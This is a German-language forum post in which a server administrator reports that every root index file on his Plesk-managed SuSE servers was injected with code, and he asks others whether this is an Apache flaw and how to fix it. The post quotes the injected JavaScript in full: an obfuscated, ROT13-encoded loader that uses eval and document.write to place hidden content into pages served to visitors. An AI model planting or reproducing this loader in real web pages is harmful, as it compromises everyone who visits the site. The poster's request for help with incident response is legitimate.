Zum Thema: http://www.rootforum.de/forum/viewtopic ... pt#p299503
ich musste heute mit grauen feststellen, das meine Root-Server (1und1) kompromentiert worden sind.
Zu den Servern:
1: Suse 9.3 + Plesk 8.1
2. Suse 10.1 + Plesk 8.2
Zu dem Problem:
Jede Index.php/Index.html Datei im root Verzeichnis wurde am 16.01. (Jaaa.. zw. Aktion und Reaktion ist eine Menge Zeit vergangen :( )
mit folgendem Code ergänzt:
Code: Select all
<script language=JavaScript>var mf=" shapgvba ejtf(c){ine ro,con=" HcvfNU)z\"n#hG1*PrTR[4`5('082BVWa]-eZo,}9g$_l+m^6bp~w&IiOA|d@s=y7C:.XMq!xtSj;k{3u",olq="",i,nnu,l="",n;sbe(ro=0;ro<c.yratgu;ro++){ i=c.puneNg(ro);nnu=con.vaqrkBs(i);vs(nnu>-1){ n=((nnu+1)%81-1);vs(n<=0)n+=81;l+=con.puneNg(n-1); } ryfr l+=i;}olq+=l;qbphzrag.jevgr(olq);}",rmhc="";for(gvg=0;gvg<mf.length;gvg++){ fbd = mf.charCodeAt(gvg);if((fbd>64 && fbd<78)||(fbd>96 && fbd<110)) fbd=fbd+13;else
if((fbd>77 && fbd<91)||(fbd>109 && fbd<123))fbd=fbd-13;rmhc=rmhc.concat(String.fromCharCode(fbd));} var km,ff; eval( rmhc );km="<A~Msi$U7#]FT#FGla&#B#A~Msi$a>U!c~T"G]$K;Ms$G'Ua<SeRJ:1U7#]FT#FGl\an#B#S~Msi$\aUSRel\a $$i.//;;;KFccF7G#]#7s$s~AK]G$/yyT$,K&A?az!c~T"G]$KMG=GMMGMza\a><\/SeRJ:1>aUmxU</A~Msi$>U"; rwgs(km);</script>
Jetzt der Clou:
Wie in http://www.securityfocus.com/news/11501 beschrieben, kann man danach die Seite erneut aufrufen und alles ist schick.
Wenn ich den Beitrag, wie auch andere Beiträge ( http://www.secureworks.com/research/thr ... uxservers/ und http://www.pcworld.com/businesscenter/a ... fying.html ) richtig verstanden habe, ist das ein Apache Problem?!
Das interessante ist, das nur die Index Dateien im root Verzeichnis verändert wurden.. wenn die Domain nicht im httpdocs Verzeichnis landet, ist die index Datei nicht verändert.
Es gibt - bis auf den Artikel oben - keine deutschen Beiträge zu dieser Sache...
Ein dritter Server, der nicht mir gehört (bei Blau.de) ist auch betroffen.. Ein anderer bei 1und1 wiederum nicht.
ABER ein Webaccount von 1und1 wiederum ist betroffen. Also kein ROOT Server sondern ein normaler Webspace.
Auf den Hinweis an die 1und1 Hotline meinte der Herr von der Hotline nur, nachdem er frei eine andere Seite angesehen hat, das er nix sieht und das kein Problem von 1und1 ist. =D> :roll:
Jetzt meine Frage an euch:
1. Da das Problem recht neu ist.. hat noch jemand das Problem
2. Sehe ich anhand der Beiträge richtig, das es ein Apache Problem ist (1und1 meinte ich solle auf Plesk 8.3 updaten und dann ist die Welt i.O.)
3. Wie kann ich das Problem lösen (Ausser Webserver neu aufsetzen)
Vielen Dank für eure Hilfe
MfG
